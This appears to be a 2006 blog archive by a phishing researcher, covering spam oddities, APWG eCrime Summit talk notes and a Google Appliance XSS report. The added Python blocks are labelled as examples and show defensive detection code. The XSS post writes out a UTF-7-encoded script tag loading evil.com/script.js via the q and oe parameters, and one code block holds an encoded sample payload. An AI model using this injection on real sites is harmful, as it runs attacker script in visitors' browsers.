Thursday, November 30, 2006

new toy

On the 27th I ordered a new toy from Apple; well, okay, it's a computer and thus a tool for my research. I figured since I was buying a new laptop, I should go all out and get dongles for it too; it's important to be able to hook it to a monitor, projector or TV, so I bought an S-Video, a DVI, and a VGA dongle to plug into it. Funny thing, they arrived two days ago.

So needless to say, last night I was anxious for it to show up. FedEx was shipping it from China, and I had been following it on its travel through Alaska. When I went to bed, it was still en route from Alaska. FedEx woke me up at 8:30 by pounding the hell out of my door, and there it was! Incredibly fast. Go FedEx.

Anyhow, I'm as always infatuated with Apple's packages, so I slowly opened the sucker, marveling at how they used a thick shipping box with only corner foam pieces to kind of minimize waste. (They have been getting lots of flak recently about being harmful to Ms. Earth.) Anyhow, inside the brown box was a really pretty marketing box that mostly shows off their presentation abilities.

Tearing through the tape, I pulled all the stuff out of the box noticing a new flavor of foam: it looked waffley. Stamped on the foam too was the MacBook logo. I still think it's odd that Apple goes through the trouble to make things so pretty when people will only see them once. Maybe it's for geeks like me who enjoy opening boxes way too much.

Box drooling aside (not quite as cool as the original cube iPod boxes), I pulled out my new workhorse and opened it up. I really like this new magnetic latch. One of my peeves about the 12" PowerBook is the flimsy latch.

Of course the best thing about the way Apple ships their laptops is the full battery. I've never seen instructions packaged with any battery-powered Apple product that say "plug in for charging before first use" or even "go buy a battery." They take good care of their customers -- cell phone manufacturers could take a hint from them.

Anyway, all things in order, I've set up the new MacBook just the way I want it, and am constantly being impressed by little things. For example:

  • During initial setup, you pick an image to represent your account. The software turned on the built-in iSight camera and let me take a photo of me (bed head and all)!

  • Emacs compiled in 10 minutes (took over an hour on my old PowerBook).

  • Target Disk mode rocks! I used my old laptop as an external FireWire hard disk to transfer all my documents and settings. Couldn't have been easier.

  • Third-party software, including games, was pre-installed. This included a Mancala game. I didn't know Mancala was even popular.



There's lots of software that looks fun, including ComicLife... maybe I'll post a comic strip later.

spammers concerned with fraud

It appears that some spammers are concerned with phishing and pharming attacks that will make it harder for people to find the real source of Viagra. To fight this, some spammers are telling people to actually type the URL into the browser, and not follow links in the email.

Honestly! You're at the bottom of the authority chain, you're a spammer. Just use a link.

(Link to a screengrab of the email)

Wednesday, November 29, 2006

google appliance xss

Multiple sources have been reporting a Google Appliance XSS attack. In short, the attack allows someone to tweak the variables sent to a search page in a way that lets arbitrary scripts from any domain be executed on the results page.

Say I do a search at IU's search page, and when the results are shown to me I am directed to this URL:
http://search.iu.edu/search?q=thing&output=xml_no_dtd&oe=UTF-8&...

I can change the q and oe variables such that the q variable contains <script src="evil.com/script.js"></script> encoded in UTF-7, and then set oe to UTF-7 so that the q variable is decoded as UTF-7 when it is echoed back. Then when the results are shown, evil.com/script.js is loaded on the page.

This has been shown to manipulate the results page (see this example), but since the URL must be modified, and a search query must have already been submitted, I don't see an immediate use for this.

I guess one thing that could be done is as follows: an attacker could create a custom search portal that ignores the search terms provided by a user, then executes some javascript to screw with their computer. Of course, they must be initially directed to the evil search portal... is there another use for this "vulnerability" that escapes me?
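The charset trick described above, worked through as an added example; this is not code from the original post or from Google's appliance. `render_results_unsafe`, `render_results` and `as_browser_sees` are hypothetical stand-ins, and a `<meta charset>` tag stands in for the Content-Type header the real results page would send:

```python
import html

# Charsets the results page is allowed to declare. Honouring a request-supplied
# charset such as UTF-7 is what lets an innocent-looking q become markup.
ALLOWED_OUTPUT_ENCODINGS = {"utf-8"}


def as_browser_sees(q: str, declared_charset: str) -> str:
    """Decode q the way a browser would after reading the page's charset."""
    if declared_charset.lower() == "utf-7":
        return q.encode("ascii", "ignore").decode("utf-7", "ignore")
    return q


def looks_like_utf7_markup(q: str) -> bool:
    """Detection check for access logs or a filter rule: would q turn into
    HTML if the page were ever served as UTF-7?"""
    return "<" in as_browser_sees(q, "utf-7")


def render_results_unsafe(q: str, oe: str) -> str:
    """The pattern the post describes: charset taken straight from the request
    (oe) and the query reflected as-is. Nothing in q looks like HTML, so a
    naive '<' filter would pass it, yet a UTF-7 page renders it as a tag."""
    return f'<meta charset="{oe}"><p>Results for: {q}</p>'


def render_results(q: str, oe: str) -> str:
    """Hardened: pin the charset to an allowlisted value and HTML-escape q,
    so neither the encoding nor the content can be chosen by the request."""
    charset = oe.lower() if oe.lower() in ALLOWED_OUTPUT_ENCODINGS else "utf-8"
    return (f'<meta charset="{charset}">'
            f"<p>Results for: {html.escape(q, quote=True)}</p>")


# Constructed sample query: "<" and ">" written in UTF-7 as +ADw- and +AD4-,
# with a placeholder script name instead of a real domain.
SAMPLE_Q = "+ADw-script src=s.js+AD4-+ADw-/script+AD4-"
```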

Monday, November 20, 2006

powered by the Microsoft

I got an interesting spam today that said I won the Microsoft Lottery (the UK Microsoft Lottery). It was your usual email, except I'm sure its performance was much better; there was a tag at the bottom that said:
this is powered by the Microsoft®

Friday, November 17, 2006

apwg: day 2, law and enforcement

Today was mostly geared towards law enforcement and legal arguments about how and why phishing (and other electronic fraud) is difficult to catch.


Stanley W. Crowder (Special Agent, US Secret Service)
Mr. Crowder talked about how the USSS investigates phishing to help find people, stop them, and generally protect consumers. He mentioned that there are lots of carding websites used for fraud. Also, there is a tremendous underground culture (or market) centered around stealing and using identity for financial gain. Take-home message: Law enforcement needs help breaking through the technological barriers to catch bad guys.

Michael Levin (Dep. Dir. National Cyber Security Division, DHS)
Agent Levin gave a little insight about how his division at the DHS operates. It appeared to me that his emphasis was on DHS's main aim: getting different communities (intelligence, academia, law enforcement) talking to each other. He believes all police should be equally well trained on cybercrime so they can help collect and identify digital evidence when they visit a crime scene. He also believes in establishing good relations between US feds and other countries' federal cops by "drinkin' beer or drinkin' vodka or wrestlin' with 'em" -- whatever it takes.

DHS interacts with the public via CyberCop. You can register for the CyberCop portal and obtain a weekly newsletter called "unusual suspects" sharing some sort of interesting information (don't know what).

odd spam



Today I got spam consisting of a lot of random numbers chosen and formatted to spell out a domain name. Click the above picture to see the whole email. Kind of weird. Anyone else seen anything like this?

Update (17-Nov 12:17): It appears to be a very cryptic pump and dump scam. See the stock ticker on yahoo.

Thursday, November 16, 2006

apwg: Sven Karge

Sven Karge talked about legal implications of phishing in Germany. There were lots of subjective details, but in short, be really, really careful if you fly through Germany after doing anti-phishing studies where you simulate sending phishy emails. There are lots of issues with copyright infringement, though the laws he presented seemed pretty fair -- criminal intent is important to prosecute. He also suggested ways to improve tracking and shut-down of international phishing operations:
"To prosecute, we need good international cooperation."
This includes well-established and court-approved evidence sharing procedures so we can prosecute phishers in international courts.

apwg: John Brozycki

Representing an "anonymous" financial institution, John Brozycki talked about how Phish Feeding works. You automate attacking phishing sites by feeding in bad data. The bad data then comes through to your site when the phisher attempts to use it. You can watch the phish food turn into phish poo (not an official term) and track their behaviors. Additionally, you can flood a phisher's site with so much bad data that they get pissed off and stop bothering you.

Phishers respond to this by implementing captchas (Turing Tests). Unfortunately, most use bad captchas, so scripts still work to infuse bad data. Another thing he brought up was that phishers can block traffic from certain areas (e.g., the institution they are spoofing). You can get around that by purchasing DSL connections.

More information at TrueInsecurity.com, email phishfeeder at that domain for info about phish feeding.
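A defender-side sketch of the tracking half of phish feeding, added here as an example; it is not code from the talk, from the financial institution, or from TrueInsecurity.com. `CanaryLedger`, the site labels and the IP addresses are invented for illustration: each fake credential is recorded when it is fed, and the real login handler recognises it when the phisher tries it, which yields timing and source data per phishing site.

```python
import secrets
from datetime import datetime, timedelta


class CanaryLedger:
    """Feeder-side ledger: which fabricated credential went to which phishing site."""

    def __init__(self):
        self.fed = {}   # (user, password) -> (site, fed_at)
        self.hits = []  # uses of fed credentials observed at the real login

    def new_canary(self, site, fed_at):
        """Mint a unique user/password pair to submit to a phishing site;
        uniqueness per submission is what ties a later login back to the site."""
        user = f"cust{secrets.randbelow(10**8):08d}"
        password = secrets.token_urlsafe(9)
        self.fed[(user, password)] = (site, fed_at)
        return user, password

    def check_login(self, user, password, src_ip, seen_at):
        """Run by the real login handler before normal authentication;
        a match means the phisher is replaying the data we fed."""
        entry = self.fed.get((user, password))
        if entry is None:
            return None
        site, fed_at = entry
        hit = {"site": site, "user": user, "src_ip": src_ip,
               "delay_s": (seen_at - fed_at).total_seconds()}
        self.hits.append(hit)
        return hit

    def report(self):
        """Per-site behaviour: how many fed logins were tried, from where, how fast."""
        by_site = {}
        for h in self.hits:
            by_site.setdefault(h["site"], []).append(h)
        return {s: {"uses": len(hs), "ips": sorted({h["src_ip"] for h in hs}),
                    "fastest_s": min(h["delay_s"] for h in hs)}
                for s, hs in by_site.items()}


def demo():
    """Constructed scenario: two canaries fed to site A, one to site B;
    only site A's operator ever tries them at the real login."""
    ledger = CanaryLedger()
    t0 = datetime(2006, 11, 16, 10, 0)
    u1, p1 = ledger.new_canary("phish-a", t0)
    u2, p2 = ledger.new_canary("phish-a", t0)
    ledger.new_canary("phish-b", t0)
    assert ledger.check_login("alice", "her-real-password", "10.0.0.1", t0) is None
    ledger.check_login(u1, p1, "198.51.100.7", t0 + timedelta(minutes=5))
    ledger.check_login(u2, p2, "198.51.100.8", t0 + timedelta(hours=2))
    return ledger.report()
```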

apwg: Brad Keller

An opening talk was presented by Brad Keller, the eCommerce Business Risk Manager of Wachovia. He made some good points about internet fraud.

He claims we need to use multiple approaches and multiple tools to make phishing and other electronic fraud unprofitable. This point was followed up with the claim we need to shift the focus from "identifying a provider's site to clients" to "identifying the clients to a provider". It may be a better solution to make sure clients are valid instead of trying to prevent theft of their identity.

Mr. Keller also emphasized that much of the fraud his institution sees is not direct fraud: not just phishing, then using the data.  Keyloggers and other crimeware capture various credentials, which are then circulated on the black market.

A wealth of information can be extracted from a client's transaction and browsing habits, as well as from their IP and computer information. This can be used to help profile people and identify anomalies (such as transactions that are minutes apart, but on different continents).

All in all, he has been frequently surprised by what phishers seem to do -- it's possible that phishers don't clear cookies, suggesting it may be time to start profiling phishers themselves, instead of just relying on profiling of their sites and emails.

Things to research: Smishing, Phish Phood (not ice cream), Client Metrics, Access Anomaly Detection
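The continent-hopping anomaly Mr. Keller described, as an added example that is neither Wachovia's nor the author's code; it generalises the example slightly by using great-circle distance and implied speed instead of continent names. The 900 km/h ceiling, the 50 km jitter floor, the coordinates and the client IDs are constructed for illustration:

```python
import math
from datetime import datetime

MAX_PLAUSIBLE_KMH = 900.0  # assumption: roughly airliner ground speed
MIN_DISTANCE_KM = 50.0     # assumption: ignore geo-IP jitter within one metro area


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlmb = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def impossible_travel(events):
    """events: iterable of (client_id, timestamp, lat, lon) in any order.
    Returns (client_id, earlier_ts, later_ts, km, implied_kmh) for each pair
    of consecutive events a client could not physically have produced."""
    by_client = {}
    for cid, ts, lat, lon in events:
        by_client.setdefault(cid, []).append((ts, lat, lon))
    anomalies = []
    for cid, evs in by_client.items():
        evs.sort(key=lambda e: e[0])
        for (t1, la1, lo1), (t2, la2, lo2) in zip(evs, evs[1:]):
            km = haversine_km(la1, lo1, la2, lo2)
            if km < MIN_DISTANCE_KM:
                continue
            # Treat simultaneous events as one second apart to avoid dividing by zero.
            hours = max((t2 - t1).total_seconds(), 1.0) / 3600.0
            speed = km / hours
            if speed > MAX_PLAUSIBLE_KMH:
                anomalies.append((cid, t1, t2, round(km), round(speed)))
    return anomalies


# Constructed sample: Bloomington, Indiana (39.17N, 86.53W) and Frankfurt
# (50.11N, 8.68E); c1's transactions are 7 minutes apart, c2's a day apart.
SAMPLE_EVENTS = [
    ("c1", datetime(2006, 11, 16, 9, 0), 39.17, -86.53),
    ("c1", datetime(2006, 11, 16, 9, 7), 50.11, 8.68),
    ("c2", datetime(2006, 11, 16, 9, 0), 39.17, -86.53),
    ("c2", datetime(2006, 11, 17, 9, 0), 50.11, 8.68),
]


def demo():
    return impossible_travel(SAMPLE_EVENTS)
```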

APWG eCrime Summit

I'm in Orlando at the APWG eCrime Summit and enjoying the opening session.

I'll be posting a bit of information about some of the talks throughout today and tomorrow.

Saturday, November 11, 2006

pirate spam

I got an email today with a subject "Nicholas has uploaded new software for you". The link provided is one to a "deep discounts" software site where you can buy $9000 software for $150. What interested me was the extra content in the mail to get past spam filters.


perform the following steps:
To fix this problem, you can have the text filter send a FORM
#
2. Members of the FreeBSD group who are active testers, willing to
aptly named kernel. You should always use kernel for
probable location of the failing piece of code (e.g., the pcvt driver
language-based printers) which cannot directly print plain text.
below the soft limit, the grace period will be reset.
to be transmitted and expected.
old trusty config file after upgrading from a pre-FreeBSD2.0.5.R
a page, specify them with the ff capability in /etc/printcap.
login
Bring a printer up; the opposite of the down command.
text filter for a printer, it sets the filter's standard input to the
does not start somewhere on the middle of the last page of the
Floppy drive controller: fd0 is the ``A:'' floppy drive, and fd1
printf "\033&k2G" || exit 2
regular kill instead



And it goes on. Some of my favorite quotes from the message are:


"give them the 'machine ID' and they will respond with a corresponding rose: Permission denied"

"touch your tree."

"Print jobs who wish to make topical suggestions on changes and the general (horizontal, vertical). So, first think, then format. The format controller! In general, every reconfiguration of a SCSI bus must pay"

Wednesday, November 01, 2006

ids daily header

Today is a double-hit day for me in the Indiana Daily Student.

'Bug' in new UITS Webmail filter causes some to miss e-mails

Student's Web site receives national attention


Yesterday was a double-hit day for Chris. Two articles right next to each other on the front page.

FBI raids Ph.D. student's apartment, investigates Web site

Project might be linked to graduate research at IU

The two hits for Chris are just in the sea of articles that have been printed since the Associated Press picked up on it.